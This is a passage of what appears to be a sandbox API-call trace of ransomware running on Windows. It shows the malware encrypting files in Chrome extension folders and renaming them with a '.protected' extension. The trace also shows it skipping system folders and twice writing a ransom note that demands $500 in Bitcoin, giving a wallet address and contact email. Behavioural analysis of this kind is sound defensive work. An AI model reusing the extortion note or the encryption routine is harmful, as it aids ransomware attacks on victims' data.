returned 0x0 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.107] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29d, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.108] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29d, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.109] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.109] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.109] CloseHandle (hObject=0x168) returned 1 [0081.109] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected") returned 169 [0081.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected")) returned 1 [0081.110] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.110] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.110] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\RESTORE_FILES.txt") returned 163 [0081.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.110] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.110] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.111] lstrlenA (lpString="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") returned 684 [0081.111] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.111] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.111] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.111] CloseHandle (hObject=0x164) returned 1 [0081.111] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.111] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt") returned 145 [0081.112] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0081.112] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*") returned 147 [0081.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\.") returned 147 [0081.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.112] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\..") returned 148 [0081.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.112] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.112] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.113] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.113] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.113] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json") returned 159 [0081.113] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.113] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2ae, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.114] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2ae, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.114] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.115] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.115] CloseHandle (hObject=0x168) returned 1 [0081.115] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected") returned 169 [0081.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.protected")) returned 1 [0081.115] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.115] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\RESTORE_FILES.txt") returned 163 [0081.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.116] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.116] lstrlenA (lpString="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") returned 684 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.116] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.116] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.117] CloseHandle (hObject=0x164) returned 1 [0081.117] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned 145 [0081.117] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0081.117] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*") returned 147 [0081.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.117] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\.") returned 147 [0081.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\..") returned 148 [0081.118] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.118] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.118] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Windows") 
returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.118] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.118] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.118] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.118] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.118] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.118] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".txt") 
returned 0x0 [0081.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.121] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json") returned 159 [0081.121] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.121] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2bb, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2bb, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.122] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.122] CloseHandle (hObject=0x168) returned 1 [0081.122] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
